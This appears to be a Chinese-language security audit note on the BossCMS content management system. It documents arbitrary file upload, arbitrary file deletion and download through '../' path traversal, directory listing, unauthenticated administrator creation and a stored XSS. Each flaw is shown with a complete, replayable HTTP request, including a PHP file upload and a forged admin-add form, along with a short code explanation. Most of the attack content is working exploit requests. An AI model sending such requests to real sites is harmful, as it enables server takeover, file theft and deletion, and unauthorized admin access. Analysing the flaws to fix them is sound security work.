1、任意文件上传
限制
复现
POST /system/extend/ueditor/php/controller.php?action=uploadfile&encode=utf-8 HTTP/1.1
Host: bosscms.com
Content-Length: 761
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAsLBZuxNv1g9kBB0
Accept: */*
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/attachment/attachment.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sle15srngo4hspjv2d7ifia6b5
Connection: close------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="name"1.php
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="type"application
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="lastModifiedDate"Wed Jun 07 2023 17:22:54 GMT+0800 (中国标准时间)
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="size"20
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryAsLBZuxNv1g9kBB0--
添加允许上传的类型,上传php文件不通过
直接通过链接形式上传文件,上传后会出现访问地址
代码
上传的逻辑值判断了是否有上传文件,和上传文件的大小,并没有对文件后缀和内容做处理
2、任意文件删除
限制
POST请求,path=upload
复现
POST /system/extend/ueditor/php/controller.php?action=delete HTTP/1.1
Host: bosscms.com
Content-Length: 17
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/image/image.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: closepath=upload/1.txt
代码
同文件里有delete函数,判断以post请求的path参数是否存在并且匹配是否以upload开头
判断config中store_type是否为空,如果 不为空的话调用oss类下的delete()方法反之调用dir类下的delete()方法搜索store_type发现该处功能为设置存储方式,默认为0 。所以 走dir类下的delete()
replace对path进行简单的替换,没有涉及到要用的字符,所以可以直接写入路径../。if判断路径是否有文件,有则直接删除
3、任意文件下载
限制
mold=safe&part=backup&func=download&id=../../basic/1.txt
复现
GET /admin/?mold=safe&part=backup&func=download&id=../../basic/1.txt HTTP/1.1
Host: bosscms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=safe&part=backup&func=table
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close
代码
判断id参数是否存在,存在则拼接sql和路径赋值给$file.在判断$file是不是文件,是则返回header,readfile($file);直接读取这个文件
4、目录遍历
限制
action=listfile&folder=../
复现
GET /system/extend/ueditor/php/controller.php?action=listfile&folder=../ HTTP/1.1
Host: bosscms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: */*
Referer: http://bosscms.com/admin/?mold=site&part=site&func=init
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close
代码
先调用config指向fileManagerActionName(列出文件),在返回listfile函数;在判断get-start和get-size参数是否存在并且是数字。
在继续调用lists,接受folder参数调用arrExist函数,判断数组是否存在,存在就键值分离,否则返回空;将结果赋值给$folder;$path = dir::replace($path.'/'.$folder);将$path拼接/和$folder在替换;下面对$path的操作都是read直接读路径
通过opendir()、readdir()打开目录并读取目录中的内容
5、未授权添加管理员
限制
mold=manager&part=manager&func=add
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"eeee
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"2
复现
POST /admin/?mold=manager&part=manager&func=add HTTP/1.1
Host: bosscms.com
Content-Length: 395
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bosscms.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrrq418NZS9wguXwR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=manager&part=manager&func=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"test
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"2
添加管理员抓到数据包,退出登录发送,添加成功-跳转到登录页面
代码
以post方式请求,$data为数组赋值,if判断新密码和重复的密码是否相同,if两次密码不为空,在if两次密码是否相等,相等则向密码md5赋值给$data[pasword]
如果要触发alert(保存成功)就不要满足if..else的条件。首先这里id是不存在的,else要让username不重复,lecel等级不等于1,就跳出条件语句执行alert(保存成功),从头到尾都没有验证用户的登录状态
这里代码对username没有做xss处理也存在xss